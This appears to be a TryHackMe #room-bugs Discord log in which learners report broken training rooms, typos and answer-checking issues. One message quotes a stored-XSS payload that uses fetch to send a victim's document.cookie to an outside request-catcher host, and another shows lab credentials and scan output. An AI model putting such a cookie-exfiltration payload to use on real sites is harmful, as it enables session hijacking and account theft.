#room-bugs

1 messages · Page 27 of 1

livid escarpBOT
#

Gave +1 Rep to @simple merlin

dusky junco
#

Hi, I'm not sure who reported a bug with the MAL: Strings room (I've tried searching for your message again but I can't find it Sadge) however, the VM has been updated (moved from Windows 7 -> Server 2019) and has been assigned more resources (double the CPU & RAM) than what it previously had

#

On second thought it actually could've been via email which makes sense. But anyhow, at least it is posted here for others

dusky junco
#

I spent a good 30-45 minutes trying to find a report of it here in the Discord

eternal summit
#

THM changed it.
I've fixed it now, question modified.

midnight junco
midnight junco
#

but that wasn't one of the sites we changed the hosts entries for in task 1, and the website doesn't exist:

#

oh, I see

#

nm.

#

ty

eternal summit
midnight junco
#

yup, didn't read carefully enough, ty

teal barn
#

Is ustoun0 on discord?

teal barn
#

From 0-5min after deployment it is filtered and after 5+ min after deployment it appears closed

rare hinge
#

Hi. I noticed a bug on the Python Basics (https://tryhackme.com/room/pythonbasics) room. If I highlight and copy the contents of the "Python code output section," the flag for the "Flags" section is exposed. I thought I should report it here.

wheat fractal
#

VulnUniversity seems to not work as intended. You can't scan directories using GoBuster or Dirb. The webserver seems to be down

eternal summit
wheat fractal
#

Thanks, will check that out

lyric walrus
#

this room is still bugged, impossible to work with

dusky junco
#

hi, sorry about the delay in getting this solved. I've been really busy with Uni and other pressing THM work. This issue is all resolved now (:

queen sphinx
#

Found a borked link in the credits of ObscureWebVulnerabilities - final credited repo in Credits (Task 26) is listed, but is missing HREF tags.

onyx bluff
#

are the latest credentials for the malstrings room working? https://tryhackme.com/room/malstrings I am trying xfreerdp -f /u:Administrator /d:MALSTRINGS /p:tryhackme123! /v:10.10.108.110 and it says AUTHENTICATION FAILED every time....

livid escarpBOT
#

Gave +1 Rep to @dusky junco

dusky junco
wheat fractal
compact summit
#

I am connected to to the vpn but not able to ping the machine .

eternal summit
# compact summit

Not all machines respond to pings, especially windows machines. That's not a bug, it's default configuration for Windows

wheat fractal
teal barn
eternal summit
#

It's been reported and flagged to staff a number of times already

teal barn
livid escarpBOT
#

Gave +1 Rep to @eternal summit

glad badger
eternal summit
teal barn
slow sundial
#

The carnage room has a bug in the 4th last question ... The correct answer is being shown as wrong @hazy hinge @summer glade

gray marsh
#

hi folks! not sure if this has been brought up yet but https://tryhackme.com/room/networkservices seems to be bugged for task 3. The machine is supposed to have 3 ports open but it seems to be just one. I did: nmap -p- <ip>

zealous heart
zenith mortar
#

i also tried it with attackbox but same result

#

when i upload and get revershell it allow me navigate around for a minute but then it crash

#

alweays connection timeout or gatewat error

#

gateway*

delicate mist
#

idk if I'd call this a bug but:
https://tryhackme.com/room/introtolan
Task 1
The view site demonstration starts with a ring topology but the text info isn't in the same order. The flow of the "view site" demonstration makes more sense starting with ring. I personally would think the text descriptions on the left are out of order?

eternal summit
zenith mortar
#

let*

#

but if i had misconfiguration on my VM, i dont understand how it could crash on attackbox

dusky junco
livid escarpBOT
#

Gave +1 Rep to @delicate mist

delicate mist
#

Sounds good 🙂

dusky junco
#

Thanks (:

delicate mist
#

Doesn't affect functionality or anything so def a low priority anyways. Just saves people from bouncing around the description if they're following the visual side and vice versa lol

dusky junco
#

For sure! 😄 I understand. I'll take a look into this asap

woeful slate
zenith mortar
#

but was connected for a minute

stray wigeon
#

Hmm... I am also getting a 504 for https://LAB_WEB_URL.p.thmlabs.com from the IDOR room? 🤔

stray wigeon
earnest yoke
#

I'm having an issue with the Attractive Directory room (https://tryhackme.com/room/attacktivedirectory). Trying to list the shares, results in a dialect mismatch:

Enter WORKGROUP\homesen's password: 
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.197.21 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

This happens on both the attackbox and my local (fully patched) Kali machine. Though the attackbox gives a hint on what the issue would be:

smb1cli_req_writev_submit: called for dialect[SMB3_11] server[10.10.197.21]
Error returning browse list: NT_STATUS_REVISION_MISMATCH
#

Maybe someone can change the allowed SMB dialects for that box to at least allow smb 2.0

#

Using a Win10 client, I can connect just fine O.o

#

🤬 Strike that. It was yet another layer 8 problem 🤦

gleaming shadow
#

a lot of those are 🙂

midnight junco
livid escarpBOT
#

Gave +1 Rep to @midnight junco

noble timber
#

grep "81.143.211.90" access.log (also returns nothing)

quasi jay
#

What is the value of the administrator cookie? (username = admin)
I set the Cookie to Admin and not to admin, it is a correct answer with the Uppercase Admin has but if u try bypass auth with the Uppercase Admin it doesnt work. u need lowcase admin hash, its only different string in the hash but it doesnt work 😄

#

thats from the event today (day 2)

merry thorn
#

it should be "a" right ?

#

from day 2

zealous heart
#

Query params are mostly used with GET request
Post data is not include in url mostly.
shouldn't the diagram should states that too

gleaming shadow
gleaming shadow
#

I've always said an

hollow gulch
#

Day 2 - After registering the account on static website (link in task content), there's a bit spelling mistake, adminisator. It should be administrator (if I am not taking this wrong or if the spelling is intended).

merry thorn
#

maybe i'm wrong

gleaming shadow
#

I don't know what the official best way is either

merry thorn
#

its mb its an

obsidian kiln
#

Ew. No way

#

That definitely needs to be "a HTTP request"

plain sandal
#

not entirely sure if this is a bug or if something's off for me, but thought I'd leave this here in case anyone else encounters it
I get this when I refresh login page (consequently I never get to the intended mxxxxx.html page intended for the advent second days task)

Request URL: https://static-labs.tryhackme.cloud/sites/aoc-cookies/redirect.js
Request Method: GET
Status Code: 404  (from disk cache)
Remote Address: 104.21.46.15:443
Referrer Policy: strict-origin-when-cross-origin
twin tapir
merry thorn
#

but an was correct when i checked with grammar checker

glad badger
#

An we go by Grammarly. 🙂

twin tapir
#

I was right

plain sandal
young shore
#

advent of cyber, day 2 username "Admin" will give you a cookie that passes question 5 but won't actually bypass the login on the website.

barren pivot
#

Can someone help me with a problem in advent of cyber 3 day 2?

#

The static website doesn't seems to be working for me

#

Nothing happens even if I click the sign up button

#

It would not go to the sign up page

#

and I'm stuck at the login page

plush prism
young shore
plush prism
#

ahh right, I don't think TryHackMe is case sensitive

plain sandal
#

^, i entered uppercase before and it was correct, even if that didnt actually work

plush prism
#

uppercase in which?

#

the answer box or the cookie?

plain sandal
#

i had upper case in both, question got completed but cookie didnt work

plush prism
#

yh that makes sense if the answer form isn't case sensitive

nimble fractal
barren pivot
#

this?

#

I tried loading the site on my phone with the same wifi network but It didn't work

#

Then I used mobile data on my phone and it worked

#

IDK why tho

plain sandal
#

imagine if its the router

barren pivot
nimble fractal
rugged canyon
#

!docs verify

tropic flameBOT
barren pivot
#

wait

livid escarpBOT
#

Gave +1 Rep to @rugged canyon

barren pivot
#

It worked on mobile data wifi hotspot

#

But not on my home wifi

rugged canyon
#

nice

#

still weird but nice

barren pivot
#

IDK what's the difference between these too

barren pivot
plain sandal
#

isp doing some anti-jquery nonsense 😂

barren pivot
#

IDK if this is true tho

rugged canyon
#

hmmm well there is a tool to check that

barren pivot
rugged canyon
#

if shadow can find it again sure

barren pivot
#

It's actually pretty weird that the JS wouldn't load on my wifi but it would on my mobile data

#

My wifi's actually faster than the mobile data

rugged canyon
#

found it

#

ooni probe @barren pivot

barren pivot
livid escarpBOT
#

Gave +1 Rep to @rugged canyon

rugged canyon
#

they have an app on f-droid

barren pivot
#

ok

rugged canyon
#

apparently on google playstore too

plain sandal
#

can it detect specific libraries being blocked? that would be pretti cool

rugged canyon
#

just did not check there first

#

think it can detect most of those things but unsure actually

barren pivot
#

I'll check that out

rugged canyon
#

also the app is made by the people behind tor so yeah of course they have knowledge in the field

barren pivot
#

There's a desktop app too

#

I'll try installing the desktop app

rugged canyon
#

yeah just having it on your phone means you can compare the results

barren pivot
#

yes

plain sandal
#

(dont answer if you dont want to) but you're not possibly from china are you? found an issue on git saying that this CDN is banned there -> ajax.googleapis.com
which possibly loads the jquery

barren pivot
#

But very close to China

#

A country near China which has recently gone worse

plain sandal
#

might be the same then
well hopefully the onii thing gives a good answer

barren pivot
#

Yes

#

Now the website works even with my wifi

rugged canyon
#

what the meeps

barren pivot
#

Well the onii test result was kinda interesting

#

It showed some censorship which I'm aware of

#

Things like facbook, insta, twitter etc

plain sandal
#

why in the world would it just start working tho

barren pivot
#

They showed 404

#

After I loaded them once they now work with my wifi

plain sandal
#

oh so its just a happenstance then

#

that you have it locally in your dom still or something

#

odd that there's different bannings on your ISP & your phone

barren pivot
#

It's rly weird tbh

#

And also the bannings differ with different isps

twin tapir
crisp widget
#

cookies are the biggest scam lol

#

I played Advent of Cyber, did everything that room told me, refreshed the page and it didn't work. You had to go there again and press on here link again for the page to display content. Refresh doesn't work, when theoretically, it should. These are trolls

simple shell
#

Refresh worked for me once I pasted the new value into the cookie

twin tapir
#

as mentioned in #site-bugs this is not a troll. You had the wrong page

fervent cobalt
# twin tapir should be fixed now. Apologies.

Although the page loads and I can complete the challenge, I still get the same error (different remote address tho) and the page keeps refreshing in a loop, but if i delete the cookie, the reloading stops.

foggy quartz
#

Looks like I submitted wrong cookie in the answer for what's the administrator cookie in the day 2 of The advent of cyber, it still accepted it as correct answer

#

Although a different cookie value worked on the siite

wind wraith
#

Hi @dusky junco , no worries! I'm glad that it's fixed. Thank you so much.

livid escarpBOT
#

Gave +1 Rep to @dusky junco

quick sonnet
#

hi

#

https://tryhackme.com/room/osqueryf8 plase can you update the answer for this question according to the plugings update on the https://github.com/polylogyx/osq-ext-bin

GitHub

Extension to osquery windows that enhances it with real-time telemetry, log monitoring and other endpoint data collection - GitHub - polylogyx/osq-ext-bin: Extension to osquery windows that enhance...

tardy lynx
#

USTOUN MS-SQL database is broken and completely fails to start. Box boots but the MS-SQL Service fails to start and port is forever closed.

tardy lynx
#

help

oak prairie
#

Hi I'm in OWASP Juice Shop room right now, do anyone have same issue with the missing images in every task??

eternal summit
eternal summit
#

Not a bug. Windows machine. Default behaviour

turbid shard
#

Image not loading

turbid shard
oak prairie
#

I've found so many rooms also have same issue...images not loading or it missing?

eternal summit
#

Especially on older rooms because you couldn't upload images directly previously

oak prairie
eternal summit
#

If it's being blocked, I suggest changing your DNS as a first measure. Don't use your ISP's DNS servers

turbid shard
eternal summit
#

That's flaticon breaking their site, totally out of control of everyone except flaticon

#

@glad badger There's a bunch of flaticon images in the network services room and they're no longer accessible in many countries. From memory, they were just icons rather than being critical to the task.

strong arrow
#

So in AoC3 on day4 (today) it gave a path to a wordlist (/root/Rooms/AoC3/Day4/) but in the AoC3 folder there is a path to day9 (/root/Rooms/AoC/Day9) I think it has some parts of the day9 challange in it

obsidian kiln
#

Sssssshhh chceyes

#

Updating the AttackBox is a relatively complicated process, so a lot of the material will have been added at once :)

strong arrow
#

ah

#

well, uhh imma just ignore it then

eternal summit
obsidian kiln
strong arrow
#

on on a diferent account or something

obsidian kiln
#

I mean, you have root access

strong arrow
#

true

obsidian kiln
#

inb4 I convince CMN to install a rootkit to release files on a timer

strong arrow
#

they could atlest hidden it better

glad badger
strong arrow
glad badger
#

Day 9 the task. 👍

strong arrow
#

ah

#

lol

glad badger
#

Good spot though. 😄

strong arrow
#

thx

glad badger
#

See if you can find who was put on the naughty list in Day 4? 😄

strong arrow
#

I just saw a directory named rooms and a subfolder named AoC3 and i just had to check (Im a curius person), btw there is a copy of the file that is in the Day9 in the /root/ folder :)

merry thorn
#

today's flag
I forgot to close the bracket but still it worked

eternal summit
merry thorn
#

is there a channel for them?

eternal summit
merry thorn
#

oh i get it now

#

👍

obsidian kiln
strong arrow
glad badger
glad badger
#

Santa has a calendar.

dark hearth
#

repost.

strong arrow
#

who is "MurilandOracle"?

strong arrow
obsidian kiln
strong arrow
#

ah

white osprey
#

Not sure if already known or cared about but thought i'd mention it. if using the attackbox on day4 you can access a pcap file for day 9. (assuming stuff for other days too)

#

nevermind. seems someone mentioned already.

stuck spoke
#

In Complete Beginner (I'm doing this for fun) in Introductory Researching, Task 4 the question 'SCP is a tool used to copy files from one computer to another.
What switch would you use to copy an entire directory?' shows the hint of 'man scp' but the question only has 2 asterisks AND 'man scp' is reported as the wrong answer.

#

I have tried man scp, cp, cp -r, but nothing is working.

strong arrow
humble lake
#

last day thm challenge contained a wrong explanation to fuzz using cluster bomb, but it should be sniper

#

kindly fix it

obsidian kiln
#

cc @dusky junco

dusky junco
#

I'll take a look into this today

#

I had to change how the web app performed at very last minute which would've affected how the attack type in burp is so the content might be a little bit misleading

#

thanks for letting me know

humble lake
obsidian kiln
humble lake
livid escarpBOT
#

Gave +1 Rep to @obsidian kiln

humble lake
#

lol

eternal summit
cold haven
#

Note sure wether it's intended or not, but in room https://tryhackme.com/room/linprivesc , in the "challenge" part
||You can see precisely where is the root flag from the .bash_history file of leonard (thanks to the cd and cat commands), so you can skip the last part of the privesc with the SUID base64 command.||

hazy tiger
#

This happens in most rooms lol

#

Older rooms don't get updated

#

But newer ones are checked before release

stray wigeon
#

Hmm... I am confused about the XSS room (https://tryhackme.com/room/xssgi). I can't solve the last task (number 8).
The payload seems to be not working but I have the feeling that the room is broken(?).
The first option with nc on my machine (yes I am on VPN) is simply not giving anything back.
The second option with the THM Request Catcher gived me a "Someone looked up this domain" as a result but nothing else. The div is looking like this <div><textarea class="form-control"></textarea><script>fetch('http://<my_session_id>.log.tryhackme.tech
?cookie=' + btoa(document.cookie) );</script>

I created now a new session but this doesn't even show any DNS request captured...
I know that it is working because I can trigger it manually with my browser and see requests coming in

zinc estuary
#

i am also stuck on the same step. i'm coming back to it later, i;ve been stuck on it for an hour and have made no progress. 🥲

past cedar
#

In https://tryhackme.com/room/walkinganapplication on Task 3 Flag 1:
Trough the link in the HTML comment I was able to get the url for the "thm-framework-login" and could log in with the default credentials. after this the Flag was shown as clear text to me but the Flag isn't accepted as answer?

turbid coyote
#

In https://tryhackme.com/room/ccpentesting on Task 20 Flag 9:
Even with the write up information it doesn’t recognize the answer when trying to submit. I understand the answer and command though whichever way entering it doesn’t recognize the answer. Any help or advice?

astral osprey
#

i can't get through 1 day lol, I just can't close this window to see new grinch position

marsh flare
#

hey all, i just joined, really excited about all this. But there's a question which just plain wrong, i wanted to bring it to someone's attention.

twin tapir
marsh flare
#

uh oh

#

sorry for breaking your website

#

okay i found my way back now that stuff about "but there's no gui" makes more sense. ty, mods = gods

eternal summit
#

Not a mod, good god we wouldn't make cry a mod

marsh flare
#

this is a big place, you guys really have 100,000 discord users?

eternal summit
marsh flare
#

that's nuts

stone sinew
#

I have no idea how to use Discord properly yet, so I apologize if this is not the place to mention it. However, I found a "bug" on day 2 of this years' cyber advent event. What's the best way to mention it? Nothing is technically broken, just unlocks if you type in a specific username without having to do any cookie manipulation...

sonic willow
#

@remote hamlet

hazy tiger
sinful granite
#

Hello,
I think there is a bug (maybe i didn't understand well) with Advent of Cyber 1, Day 9. When i requests (curl or firefox), IP:3000, nothing happens. And without the JSON in the response, i can't resolve the challenge :/

mystic crest
#

Room: Hackermethodology
Section: Exploitation

Seems like the burp suite logo is not loading due to CORS policies.

void spruce
midnight junco
#

the either is prob off too, unless you were going with "set up your own kali box, or use an attack box"

eternal summit
#

It's accessible from outside THM

midnight junco
#

ok, was just pointing out the grammar. Is that helpful or not? I'm not always sure.

twin tapir
eternal summit
#

It could be clarified, but IDK why it should be an AND?

mystic crest
#

the grammar is fine, you can access that link without any form of attack box or VPN. you can do either one, accessing the link or going through the attack box

midnight junco
#

I see what you're saying, it still reads as a little bit awkward, but that's good to know

#

thanks!

#

that wasn't clear to me

teal barn
#

AoC3 - day 4, mising closing parenthesis

teal barn
#

I still have the same problem

teal barn
#

It's still happening

eternal summit
#

@teal barn Please stop

#

THM staff have been made aware

#

Pinging everyone that's seen the issue is not helpful and is honestly spam

teal barn
#

It would be good if the issue tracking on room bugs was public

eternal summit
#

The issues tab on rooms was abandoned due to abuse.

teal barn
#

or maybe a banner on section on room page to mention that a bug troubleshooting in on the go

teal barn
#

this issue exists since April 2021 and nobody is able to track any change

#

or sometimes we leave a message here but if nobody anwser we can't know if the staff has been informed or not

#

and if it is fixed one day I won't have any way to be notified it's fixed

#

other than coming here every week to ask if it's fixed

#

feels like there is a lack of transparency on issue tracking

eternal summit
teal barn
teal barn
#

I think the issue tab should be re-introduced but status could be updated only by staff (not content creator) to avoid abuse

hazy tiger
#

Staff are super busy

#

We can't be updating the issue tab for every room

eternal summit
#

Not only just updating, but half the bugs reported here are either user error or answer tolerance.

hazy tiger
#

90% of room related emails are actually user issue.
It takes forever for me to verify the rooms are not broken because I have to get in touch with the content creator and then try and see if someone can replicate the bug, only to find out that someone didn't follow the steps in the room correctly.

teal barn
eternal summit
teal barn
teal barn
#

I'm really bored getting into old room (or even not so old rooms), starting hacking, being stuck during hours, reading write-ups to find a service is missing, of the app doesn't behave the expected way, report it on "room-bugs" channel on discord and find it was reported months ago many many times, a bug status could have spared me hours of necessary struggling by just informing me that the box is actually broken

#

when a room is confirmed broken, just updating the status without giving much details shouldn't take more than 30sec

#

I hope THM will continue to recruit more staff to help you be less busy 🙂

hazy tiger
#

And if it's not a staff room, it becomes really difficult for us to get a hold of the machine and fix it as we don't always have the tools and people ready to do that

teal barn
hazy tiger
#

So why is it in the room-bugs chat and not on the feedback form? 🙂

teal barn
#

I already submited it in the form

hazy tiger
#

My point still stands:)

teal barn
#

I just realized it has been reported broken dozens and dozens of time since April 2021, just a "status; broken" information banner on the room would have avoid all that discussion 🙂

hazy tiger
#

Look, I know you're here to complain that it hasn't been fixed, you've made that clear.
At the end of the day, it's not going to help you get your issue resolved faster.

#

You have submitted your feedback to the feedback form and that's great.

#

Now all I'll ask is that we leave the issue and end the conversation because I don't have the time or energy rn

#

Deal?

teal barn
teal barn
hazy tiger
#

Cool, thanks

wheat fractal
wheat fractal
#

about the loki outdate issue https://tryhackme.com/room/yara you might want to check the entire room and file1/ind3x.php I did test the sudo and please mention me for updates I really want to know.

wheat fractal
flat grove
eternal summit
livid escarpBOT
#

Gave +1 Rep to @eternal summit

signal ridge
#

Godd Morning, I'm in the file Inclusion Room on Task 2. I have to visit the Link "http://MACHINE_IP/" but it doesn't work, i just get the error that the server is not found

raven cove
signal ridge
raven cove
signal ridge
raven cove
raven cove
raven cove
raven cove
signal ridge
livid escarpBOT
#

Gave +1 Rep to @raven cove

old umbra
#

The "Linux Fundamentals Part 1" room task 7 question2 and question3, shows right answer on wrong answers

old umbra
# old umbra

the correct commands should be "echo password123 > passwords" and "echo tryhackme >> passwords"

shadow crane
#

Just wanted to report that in room "Network Services", under " Enumerating FTP":

#

"How many ports are open on the target machine?"

#

site says 1 is wrong, and 2 is correct, but the machine has only port 21 open

teal basalt
shadow crane
#

yep

#
# Nmap 7.92 scan initiated Tue Dec  7 10:22:02 2021 as: nmap -p- -vv -sV -sC -oN nmap.txt -Pn 10.10.241.10
Nmap scan report for 10.10.241.10
Host is up, received user-set (0.056s latency).
Scanned at 2021-12-07 10:22:03 UTC for 31s
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE REASON         VERSION
21/tcp open  ftp     syn-ack ttl 63 vsftpd 2.0.8 or later
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.11.55.157
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0             353 Apr 24  2020 PUBLIC_NOTICE.txt
Service Info: Host: Welcome

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Dec  7 10:22:34 2021 -- 1 IP address (1 host up) scanned in 31.34 seconds
teal basalt
#

Perhaps the other service didn't start yet 🤷‍♂️
Could you try scanning it again?

shadow crane
#

sure

#

oh

#

ok port 80 just got opened

#

guess I was too fast with machine boot

#

false report then 🙂

teal basalt
#

Have fun👍

shadow crane
#

didn't knew I had to wait after I get the IP on the site

teal basalt
#

Yeah, it is similar to how our local system takes time to boot
The target machine does take time to boot properly as well🙂

shadow crane
#

yeah ofc makes sense 🙂

#

tnx for the help 🙂

wheat fractal
#

In OWASP Task 11 i type in ( in the browser ) the machine ip with /login and it just wont load the page

flint robin
#

Room: https://tryhackme.com/room/mrrobot
The machine is very slow, I'm doing directory enumeration with directory-list-2.3-small.txt wordlist and it takes like forever. (not even 10% in about 15mins)
Considering all the rooms I've done so far, doing directory enumeration with directory-list-2.3-medium.txt never takes more than 15 mins.

I have talked about this here #site-support message and here #infosec-general message

Please acknowledge.

cinder wolf
#

Hey Hey
AOCyber Day 4 Step 10.4 has a misleading line instructing folks to use a Cluster Bomb attack instead of a Sniper attack that the video used.
Figured I'd mention it here shrug

fringe thistle
#

I didn't finish this module but still have awarded with the completion badge

teal basalt
fringe thistle
#

yep

#

I was thinking the same

#

Probably completing only the room "command injection" gives you the badge

#

It says it too

dim bloom
#

Hello, I believe Anonymous machine has a bug

void vortex
glad badger
livid escarpBOT
#

Gave +1 Rep to @void vortex

minor vapor
#

i think i found a error in the walking an application room on task 3

#

when you goto the address that is listed it gives you a NGinix page and not the acme tools site. also I think the Flag might be missing for the source code because of this

minor vapor
#

Kenobi on the first real question states scan with nmap. the answer is 7 ports when really 8 are open unless I cant read lol

quasi jay
honest crescent
#

there's some potential errors in the django room

#

unit 3 has you including a project in itself, which is not possible

#

at least the way it's explained seems off

hazy tiger
#

@obsidian kiln

tired flicker
#

HI I have issue with ice room

earnest yoke
#

OWASP Top 10 room: https://tryhackme.com/room/owasptop10
In Task 26, we are told to browse a Github Gist, and copy some Python code from there. But there is no Python code, only different JSON files :/

#

And typing the code from the screenshot is a tad bit tedious 😉

strong arrow
#

In AoC3 Day9 some of the answers of the questions re shown in the images right above

near brook
#

Not really a bug, but...
Advent 3, day 8: reg add ... uses path with forward slash: C:/ while in Windows you usually use back slash.

near brook
#

Also, day 8: in the Windows machine, I do not see this sliding panel for copypasting on the left.
The suggested key combination also does not work.
I am using Chrome on MacOS (latest).

flint robin
earnest yoke
livid escarpBOT
#

Gave +1 Rep to @flint robin

wheat fractal
#

Hi, not really a bug but in the room https://tryhackme.com/room/sysmon in task 2. There is a sentence rewritten twice. In Sysmon Config Overview at the end of the paragraph. "Configuration preferences will vary depending on what SOC team so prepare to be flexible when monitoring.** prepare to be flexible when monitoring.**"

near current
#

Disk Analysis & Autopsy room is bugged, the images show as 0 bytes

plucky glen
#

Attacking Kerberos room seems to attack Rubeus when instructions are followed. Is it Windows defender?

tired flicker
#

HI I have problem with ICE room

#

msf6 exploit(windows/http/icecast_header) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > show options

Module options (post/multi/recon/local_exploit_suggester):

Name Current Setting Required Description


SESSION yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available ex
ploits

msf6 post(multi/recon/local_exploit_suggester) > set SESSION 1
SESSION => 1
msf6 post(multi/recon/local_exploit_suggester) > run

[] 10.31.186.70 - Collecting local exploits for x86/windows...
[
] 10.31.186.70 - 4 exploit checks are being tried...
[+] 10.31.186.70 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[*] Post module execution completed

#

I tried the listed vuln but that says it not x64

midnight junco
mystic crest
#

@harsh oyster 👀

#

(hope this ping is correct, didn't find a mod role that was pingable and you seem to be online)

harsh oyster
#

-mute 662379968600473612 24hrs scam link

livid escarpBOT
#

🔇 Muted TR1.#2531 for 1 day

harsh oyster
#

-mute 477272021416542208 24hrs scam link

livid escarpBOT
#

🔇 Muted !ⲘꞄ-DesTroYeR#3679 for 1 day

livid escarpBOT
#

Gave +1 Rep to @mystic crest

wheat fractal
tulip solstice
#

@spring summit or anyone else, I have been working on the rocket challenge (finished it once already). There is one issue which I don't know if it's on my part, the || cap on ruby || is not set properly, making the privesc impossible, is that normal ? What is causing that ?

obsidian kiln
tulip solstice
obsidian kiln
#

I would imagine you're getting hit by the other protection method in place which "stops it from working"

tulip solstice
obsidian kiln
#

Well now that is weird. Again, it's a static image though. It shouldn't change between deployments

#

Like, literally, it's like starting a saved copy of the same image every time

eternal summit
#

There has been some weirdness with AWS being haunted before

obsidian kiln
#

Aye, that is true

eternal summit
#

Muir you remember my box that you tested that was haunted on that instance?

obsidian kiln
#

Mhm

eternal summit
#

Should be fixed by a redeploy though

obsidian kiln
#

Yeah, I can't think of any other reason for that to happen tbh

tulip solstice
eternal summit
#

Last time with AWS being haunted, it was also file permissions

obsidian kiln
#

Yeah, that is weird.
I suspect James is right and it's AWS being really weird. See if it happens again?

tulip solstice
#

I guess I can add a service or Cron that will periodically set the cap

eternal summit
#

Very much unnecessary

obsidian kiln
#

Or, if you do, it will die after about 6 hours if you're sharing one between students

tulip solstice
#

I can clone instances

eternal summit
#

Rooms.

#

Not instances

tulip solstice
#

(teacher dashboard)

obsidian kiln
#

Teacher dashboard lets you clone machines made by other people? Huh, TIL. @dusky junco you seen this?

tulip solstice
#

Anyway, thanks for the help

obsidian kiln
#

Last I spoke to Ben neither of us could clone machines owned by other people through the dashboard 😆
This is the first I've heard of that permission actually being possible, so thanks for that

#

Like, we can clone our own, but not from accounts that don't belong to us

eternal summit
#

It probably means I should also raise with THM that I don't want my non comissioned machines cloned, because I've seen what some establishments do to them...

#

Like there's some real IP issues on stuff that THM hasn't paid for from me, cc CMNatic

obsidian kiln
#

But yeah, TL;DR: for that issue @tulip solstice, it's probably a one-off unless you can replicate? Probably not worth setting something in place for it unless you really want to. AWS is just very, very rarely weird with filesystem stuff

livid escarpBOT
#

Gave +1 Rep to @obsidian kiln

runic scroll
eternal summit
spring summit
obsidian kiln
#

Yeah, must just be AWS stuff then. Thanks mate 🙂

spring summit
#

no worries 🙂

exotic marlin
#

Not a bug but "in all types" is repeated twice on the first paragraph in OWASP Juice Shop

dusky junco
#

(maybe if theyr'e set to cloned in the manage page aswell? not sure about that one though)

#

not just anyone's vms though

eternal summit
dusky junco
#

oh cool cool

#

hopefully my understanding isn't far off haha

obsidian kiln
dusky junco
brittle yarrow
#

Hi admins I think I found a issue in day 2 Web Exploitation i'm getting really weard out puts with using cyberchef

#

I can share my out put if its needed

brittle yarrow
#

Nvm the problem is my computer .... he is changing the output 😅 after copy paste

untold olive
#

For the Intro to x8664 room, I think there's a typo in the Intel Data type suffix list. For double precision and double word, both suffixes are "l". From research I did, cause this was confusing to me, I think it's supposed to be "d" for double precision? Can someone clear this up for me? See the Snippet below for reference.

wheat fractal
#

Hey guys, in the room "linuxfundamentalspart2" I can´t conect to ssh machine. I have the command ssh tryhackme@(iptarget) so it needs a password, and the password "tryhackme" don´t works. It´s my error or it´s a bug in the room?
Room: linuxfundamentalspart2
Task 2
The terminal says: Permission denied, please try again.

untold olive
wheat fractal
untold olive
wheat fractal
livid escarpBOT
#

Gave +1 Rep to @untold olive

untold olive
wheat fractal
#

Don´t worry thanks!

untold olive
wheat fractal
untold olive
wheat fractal
wheat fractal
untold olive
#

Yes, vpn.

twilit forge
#

Cyber Advent room, day 4. Authorization is spelled incorrectly. It is written as 'authorisation' with an S instead of a Z.

eternal summit
vagrant acorn
wheat fractal
open stirrup
#

correct answer with "ol" instead of "old"

eternal summit
open stirrup
#

Done thanks

livid escarpBOT
#

Gave +1 Rep to @eternal summit

icy rose
#

So in the room intro to LAN on the ARP protocol questions i typed address wrong and got it right

eternal summit
next hare
fading idol
#

kenobi, task 3 question 2

#

the answer was 4

#

now it is only three.

#

Proof:

teal basalt
fading idol
#

nope

#

gimme a sec

#

not there are f4

#

got it

mystic crest
#

Room: Advent of Cyber 3 (https://tryhackme.com/room/adventofcyber3)
Task: 18 (Day 13, They Lost The Plan!)
Bug:
Command systeminfo | findstr /B /C: "OS Name"/C: "OS Version" has incorrect placement of spaces, it should be:
systeminfo | findstr /B /C:"OS Name" /C:"OS Version". I don't think it is really that bad of a bug, but since AoC seems to aim at being beginner friendly this might be good to correct.

valid badge
#

ROOM: AoC3 Task:18
Bug: The room accepts an incorrect answer for the return from a whoami command.
E: Looks like an answer tolerance and not a bug. Refresh returns textfield to expected value

obsidian kiln
#

Correct -- that is answer tolerance 🙂

valid badge
#

Thanks! sorry

zenith mortar
#

hi i found not a bug but a misleading info, where can i send you this?

zenith mortar
#

Task 4

#

i think it is very misleading, when you complete all steps to JWT, the final encoded cookie in base64 doesnt match the one shown as copied from THM:

Since we placed the alg value to None we don't have to add a 3rd part or the encrypted value so we can just put a dot(.) after 2nd part and leave it like that. So the final string would look like:
eyJ0eXAiOiJKV1QiLCJhbGciOiJOT05FIn0K.eyJleHAiOjE1ODY3MDUyOTUsImlhdCI6MTU4NjcwNDk5NSwibmJmIjoxNTg2NzA0OTk1LCJpZGVudGl0eSI6MH0K.

But this cookie value is for answer to question and not the one for user2, i think thats why it is misleading, its not hard to understand and its not a bug

#

but i think it may mislead kind of few people, i saw multiple times people asked on this task in help room

brittle yarrow
#

today I started [Day 4] Web Exploitation Santa's Running Behind. the ip that it's given by the assignment wont work ?? it is thare in arp command in cmd but cant be pinged and wont load in firefox

#

I did try to reset the machine but it will stay on
to connect...

strong arrow
#

Advent of cyber 3 day 13, the command given does not work:

cold haven
#

typo "Congraulations"

wheat fractal
livid escarpBOT
#

Gave +1 Rep to @untold olive

wheat fractal
potent sage
cobalt mantle
#

I'm trying the room now as well and having the same port issue

strong arrow
obsidian kiln
#

Ustoun has been set to private until the creator can be reached to fix it 🙂
cc @teal barn @potent sage @cobalt mantle

sly inlet
#

2015 stated twice in nmap04 at "Nmap Scripting Engine (NSE)" at question 2

teal barn
hazy tiger
#

?

dense garnet
eternal summit
lunar mirage
#

In room CC:Steganography in the EXAM in stage 2 is the link in the given wav file still working or I am missing something

golden talon
#

